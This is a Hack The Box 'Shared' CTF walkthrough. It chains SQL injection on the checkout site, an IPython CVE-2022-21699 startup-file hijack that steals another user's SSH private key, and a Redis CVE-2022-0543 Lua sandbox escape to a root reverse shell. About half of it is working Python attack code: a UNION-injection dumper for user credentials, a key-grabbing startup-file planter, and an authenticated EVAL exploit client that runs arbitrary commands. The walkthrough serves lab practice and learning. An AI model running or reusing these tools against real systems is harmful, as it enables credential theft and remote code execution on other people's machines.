Hackthebox — Shared Walkthrough
As always, we start with an nmap scan to see which ports are open and which services run on them.
- -sC: run the default script set
- -sV: enumerate service versions
The result shows three open ports:
- Port 22: SSH
- Ports 80 and 443: HTTP (443 over TLS)
The scan output also reveals the hostname shared.htb; add it to our hosts file.
Visit the HTTP service in the browser.
Run an ffuf directory scan in the meantime.
Also run wfuzz to look for virtual hosts.
The wfuzz result reveals a virtual host.
Add it to the hosts file as well.
The ffuf result reveals a directory called "api".
Visiting it brings up a login prompt. None of the default credentials (admin/admin, admin/password, etc.) worked.
Let's concentrate on checkout.shared.htb.
Intercept the traffic with Burp and analyse it.
Send the request to Repeater.
URL-decode the parameter so the payload can be edited in the clear.
The baseline response is 3709 bytes.
Insert a SQL injection payload to see whether the response differs from the baseline.
The response is now 3708 bytes. A one-byte difference is a weak signal on its own, so confirm it with a second pair of payloads (one that keeps the query valid and one that breaks it) before dumping anything; a change that follows the payload consistently tells us the input reaches a SQL query.
Let's dump the database information manually, step by step.
@@version identifies the backend as MariaDB.
What about the tables?
Dump them from information_schema with the query below.
Many tables. The one called "user" looks useful.
Now dump the columns of the "user" table.
The output reveals columns such as id, username and password.
Let's get the rows.
Crack the hash. Identify the hash type first; a password hash is not decrypted, it is matched against candidate passwords with a tool such as hashcat or John.
We have a credential.
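The four extraction steps above, written out as an added example that is not the walkthrough author's code. The walkthrough shows its queries only as screenshots, so the following are assumptions: the injectable value is a product code inside the URL-encoded JSON cookie `custom_cart`, the vulnerable query has three columns, and the second column is echoed back in the cart table. Verify the column count with `ORDER BY` or `UNION SELECT NULL,...` probes before trusting the extraction; the sample response is constructed.

```python
"""Manual UNION-based extraction through the checkout page (added example).

Assumptions (not shown by the walkthrough): the product code inside the JSON
cookie `custom_cart` is injected into a three-column query whose second column
is rendered in the cart table.  The sentinel MARK makes the result easy to find
in the HTML whatever the page layout is.
"""
import json
import re
import urllib.parse
import urllib.request

MARK = "xXx"   # sentinel wrapped around each result so it can be pulled from the HTML

# The walkthrough's four steps: backend, tables, columns of `user`, then the rows.
STEPS = {
    "version": "@@version",
    "tables": "group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()",
    "columns": "group_concat(column_name) FROM information_schema.columns WHERE table_name='user'",
    "creds": "group_concat(username,0x3a,password) FROM user",
}


def union_payload(expr, ncols=3, col=2):
    """Close the original string literal, UNION a row that carries `expr` in
    column `col` (wrapped in MARK) and comment out the rest of the query.
    Entries that carry their own FROM clause are split so the FROM lands on
    the UNION SELECT rather than inside concat()."""
    cols = ["NULL"] * ncols
    if " FROM " in expr:
        select_part, from_part = expr.split(" FROM ", 1)
        cols[col - 1] = f"concat('{MARK}',{select_part},'{MARK}')"
        return f"' UNION SELECT {','.join(cols)} FROM {from_part}-- -"
    cols[col - 1] = f"concat('{MARK}',{expr},'{MARK}')"
    return f"' UNION SELECT {','.join(cols)}-- -"


def cart_cookie(payload):
    """Rebuild the cookie the way the browser sends it: JSON mapping
    product code -> quantity, then URL-encoded (assumed cookie name)."""
    return "custom_cart=" + urllib.parse.quote(json.dumps({payload: "1"}))


def extract(html):
    """Pull the MARK-delimited value out of the page, or None if nothing was reflected."""
    m = re.search(re.escape(MARK) + r"(.*?)" + re.escape(MARK), html, re.S)
    return m.group(1) if m else None


def fetch(url, payload):
    """Network step (not exercised offline): send the poisoned cookie, return the HTML."""
    req = urllib.request.Request(url, headers={"Cookie": cart_cookie(payload)})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def dump(url, step):
    """Run one named step from STEPS against a live target and return its value."""
    return extract(fetch(url, union_payload(STEPS[step])))


# Constructed response: a cart row with the UNION result rendered in column 2.
SAMPLE_RESPONSE = "<tr><td>NULL</td><td>xXx10.5.15-MariaDB-0+deb11u1xXx</td><td>NULL</td></tr>"

if __name__ == "__main__":
    for name, expr in STEPS.items():
        print(f"{name:8} {cart_cookie(union_payload(expr))}")
    print(extract(SAMPLE_RESPONSE))   # 10.5.15-MariaDB-0+deb11u1
```

The `0x3a` in the last step is a colon written as a hex literal, which avoids putting a second quoted string inside the payload; `group_concat` collapses all rows into one value so a single request returns every user. If the target has more or fewer columns, or reflects a different one, change `ncols` and `col` rather than the step expressions.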
Time to use the credential to log in via SSH as james_mason.
/etc/passwd shows three users with a login shell.
Let's enumerate the box.
Find the database password.
Log in to the database with that credential.
There is nothing useful in the database beyond what we already have.
Download linpeas to the box and run it.
james_mason is a member of the developer group, and linpeas shows that this group can write to /opt/scripts_review.
So we visit the directory, but it is empty.
What is scripts_review used for?
We need more information; we will come back to this shortly.
Another linpeas finding: ipython is installed.
Download and run pspy to watch for processes that use it.
pspy shows background processes run by dan_smith (UID 1001).
The loop kills any running ipython process, changes into /opt/scripts_review and starts ipython again from there. A directory we can write to, plus another user launching ipython with it as the working directory, is the combination to look at.
IPython has a known vulnerability that fits (CVE-2022-21699, fixed in IPython 8.0.0).
It is an arbitrary code execution flaw that stems from IPython executing untrusted files found in the current working directory: IPython looked for a profile in the CWD before the user's own profile, so startup files planted there run as whichever user launches ipython, letting one user run code as another.
So we create two nested directories under scripts_review, profile_default and startup.
Inside startup, create a Python file; IPython runs every .py file in that directory when it starts.
For a first test the file prints the contents of /etc/passwd.
Good! The output shows that the startup file ran, so the vulnerability is exploitable.
Time to get dan_smith's private key: replace the test payload with one that reads his SSH private key and writes it somewhere we can read.
After the next run of the loop we have the private key.
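The startup-file trick from the steps above, as an added example that is not the walkthrough author's code. It plants the `profile_default/startup` layout under a directory standing in for /opt/scripts_review, and then mimics what the vulnerable IPython does on launch (run every `.py` in that directory from the CWD) so the effect can be checked locally. File names, the copy-to-a-readable-path payload and the key contents are assumptions; the walkthrough does not show its exact command.

```python
"""Plant an IPython startup file in a directory another user launches ipython
from (added example, not the walkthrough author's code).

IPython before 8.0.0 (CVE-2022-21699) searched the current working directory
for a profile before the user's own ~/.ipython, so anyone who can write to the
CWD can drop profile_default/startup/<anything>.py and IPython runs it as
whoever started it: dan_smith, in the loop pspy showed.
"""
import os
import tempfile
import textwrap
from pathlib import Path

STARTUP_SUBDIR = Path("profile_default") / "startup"   # the layout IPython searches


def payload_source(src, dst):
    """Python for IPython to run as the victim: copy a file we cannot read to a
    path we can, then loosen its mode so our own account can read the copy.
    (Assumed payload; the walkthrough's own command is not shown.)"""
    return textwrap.dedent(f"""\
        import os, shutil
        shutil.copyfile({str(src)!r}, {str(dst)!r})
        os.chmod({str(dst)!r}, 0o644)
    """)


def plant_startup(review_dir, src, dst, name="00-grab.py"):
    """Create <review_dir>/profile_default/startup/<name> (the two directories
    the walkthrough creates plus the Python file) and return its path."""
    startup = Path(review_dir) / STARTUP_SUBDIR
    startup.mkdir(parents=True, exist_ok=True)
    script = startup / name
    script.write_text(payload_source(src, dst))
    return script


def run_startup_like_ipython(cwd):
    """Mimic the vulnerable behaviour: execute every *.py under
    <cwd>/profile_default/startup in sorted order, as the current user.
    Returns the file names that ran so a caller can confirm the hook fired."""
    ran = []
    for script in sorted((Path(cwd) / STARTUP_SUBDIR).glob("*.py")):
        exec(compile(script.read_text(), str(script), "exec"), {"__name__": "__main__"})
        ran.append(script.name)
    return ran


def demo():
    """Stage the attack in a temp dir standing in for /opt/scripts_review with a
    constructed 'id_rsa' as the victim's key; returns the text of the copy."""
    with tempfile.TemporaryDirectory() as tmp:
        victim_key = Path(tmp, "id_rsa")            # stands in for the victim's ~/.ssh/id_rsa
        victim_key.write_text("-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n")
        loot = Path(tmp, "dan_key")                 # stands in for a world-readable drop path
        review = Path(tmp, "scripts_review")
        review.mkdir()
        plant_startup(review, victim_key, loot)
        ran = run_startup_like_ipython(review)      # on the box, dan_smith's ipython does this
        assert ran == ["00-grab.py"]
        return loot.read_text()


if __name__ == "__main__":
    print(demo())
```

On the box the two directories must be group-writable for developer, which is what linpeas flagged, and the payload runs only when the loop next restarts ipython, so keep pspy open to see it fire. Using `shutil.copyfile` rather than `shutil.copy` avoids carrying the key's restrictive mode over to the copy before the `chmod`.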
pspy, still running in the meantime, confirms the startup file was executed.
With the key we get SSH access as dan_smith.
Capture the user flag.
Privilege Escalation
Download and run linpeas again.
The executable redis_connector_dev is owned by root but readable and executable by members of the sysadmin group.
dan_smith is in that group, so we can read and run it.
The first line of its output is the interesting one: the binary connects to a Redis instance. Since there is no netcat on the box, we copy the binary to our machine to analyse it properly.
Serve the file over HTTP.
Download the binary to our machine.
Start a netcat listener on port 6379, Redis's default port, and then run the binary so it connects to our listener instead of a real server.
The binary speaks to Redis in clear text, so its AUTH command, and with it the Redis password, appears at the bottom of the listener output.
Connect with redis-cli using that password.
Try to find useful information in the stored keys.
Nothing there helps.
What is the next move? Time to check HackTricks.
The Pentesting Redis page on HackTricks describes how CVE-2022-0543, a Lua sandbox escape in the Debian and Ubuntu Redis packages, gives remote code execution.
Visit the page and download the PoC.
The exploit needs Python and the box has none, so we bring the box's Redis port to our machine with chisel, a TCP/UDP tunnel transported over HTTP and secured via SSH.
To do so, download chisel.
Download it to the box as well.
Run chisel as a server on our machine, with reverse forwarding allowed.
Run chisel as a client on the box, asking it to publish the box's local Redis port back to our machine.
The reverse port forward is up: Redis on the box is now reachable through a local port on our machine.
Get the reverse shell payload ready.
A netcat listener is waiting on port 9898 for the reverse shell.
Run the exploit script.
Oops, it did not work.
The last line of the output reveals the problem clearly: the server refuses commands until the client authenticates.
Add the Redis password we captured from redis_connector_dev.
The exploit now runs successfully.
We do not get the reverse shell back, but the output shows that we can execute commands as root.
Let's get the reverse shell!
First, create a bash script called reverse.sh in /dev/shm, where the next command reads it from.
Take the Lua part of the command from the PoC script and modify it.
The payload must print the script and pipe it into bash:
"cat /dev/shm/reverse.sh | bash"
Execute the command through redis-cli, after authenticating with the dev password.
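Both ends of the Redis exchange from this section in one runnable script, as an added example that is neither the walkthrough author's code nor the public PoC. `FakeRedis` plays the role of the netcat listener that captured redis_connector_dev's AUTH line, and it also enforces authentication the way a real server with `requirepass` does, so the NOAUTH failure from the first exploit run is reproduced offline. `exploit()` sends AUTH and then the CVE-2022-0543 EVAL the way the public PoC builds it. The liblua path (the Debian amd64 path the PoC uses), the password and the commands are assumptions or constructed values.

```python
"""Fake Redis listener plus AUTH-then-EVAL client for CVE-2022-0543 (added example).

The sandbox escape works because the Debian/Ubuntu Redis build left Lua's
`package` table reachable from EVAL scripts; package.loadlib() pulls luaopen_io
out of the liblua shared object, which yields a real io table and io.popen().
"""
import socket
import threading

LIBLUA = "/usr/lib/x86_64-linux-gnu/liblua5.1.so.0"  # assumption: Debian amd64 path from the PoC


def resp_encode(*argv):
    """RESP array of bulk strings: the wire form redis-cli uses for every command."""
    out = b"*%d\r\n" % len(argv)
    for arg in argv:
        raw = arg.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def resp_decode(data):
    """Inverse of resp_encode for one complete command; returns argv as strings."""
    lines = data.split(b"\r\n")
    count = int(lines[0][1:])                                 # "*<count>"
    return [lines[2 * i + 2].decode() for i in range(count)]  # skip the "$<len>" lines


def lua_payload(cmd):
    """Lua sent via EVAL; `cmd` sits in a double-quoted Lua string, so it must not
    contain a double quote (the walkthrough's `cat /dev/shm/reverse.sh | bash` is fine)."""
    return (
        f'local io_l = package.loadlib("{LIBLUA}", "luaopen_io"); '
        "local io = io_l(); "
        f'local f = io.popen("{cmd}", "r"); '
        'local res = f:read("*a"); f:close(); return res'
    )


def send_command(sock, *argv):
    """One request, one reply; returns the first line of the reply as text."""
    sock.sendall(resp_encode(*argv))
    return sock.recv(65536).decode().split("\r\n")[0]


def exploit(host, port, cmd, password=None):
    """AUTH (if given) then EVAL; returns the server's reply line.  Without the
    password a real server and the fake one answer '-NOAUTH Authentication
    required.', the error that ended the first exploit run."""
    with socket.create_connection((host, port), timeout=5) as sock:
        if password is not None:
            reply = send_command(sock, "AUTH", password)
            if not reply.startswith("+OK"):
                return reply
        return send_command(sock, "EVAL", lua_payload(cmd), "0")


class FakeRedis(threading.Thread):
    """Stand-in for the netcat listener: records every command a client sends
    and enforces AUTH like redis does when requirepass is set."""

    def __init__(self, password):
        super().__init__(daemon=True)
        self.password = password
        self.captured = []                    # argv of every command received
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))      # ephemeral port, exposed as self.port
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            try:
                with conn:
                    self._serve(conn)
            except OSError:
                pass

    def _serve(self, conn):
        authed = False
        while True:
            data = conn.recv(65536)
            if not data:
                return
            argv = resp_decode(data)
            self.captured.append(argv)
            if argv[0].upper() == "AUTH":
                authed = argv[-1] == self.password
                conn.sendall(b"+OK\r\n" if authed else b"-ERR invalid password\r\n")
            elif not authed:
                conn.sendall(b"-NOAUTH Authentication required.\r\n")
            else:
                conn.sendall(b"+OK\r\n")      # a real server returns the command's output here


if __name__ == "__main__":
    server = FakeRedis("s3cret")              # constructed password
    server.start()
    print(exploit("127.0.0.1", server.port, "id"))             # -NOAUTH Authentication required.
    print(exploit("127.0.0.1", server.port, "id", "s3cret"))   # +OK
    print(server.captured)                    # the AUTH entry is what the netcat listener leaked
```

Pointing `exploit()` at the chisel-forwarded port on our machine, with the captured password, is the same exchange redis-cli performed in the walkthrough; the reply from a real server is a bulk string holding the command's stdout, which is why the earlier `id` run showed root even though no shell came back.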
Finally, we get the reverse shell and capture the root flag.
We could also get the reverse shell back by modifying the PoC script itself.
Run it again after the modification.
Voila! We are in as root again.
Thank you for your time.
Originally published at http://atalaysblog.wordpress.com on November 12, 2022.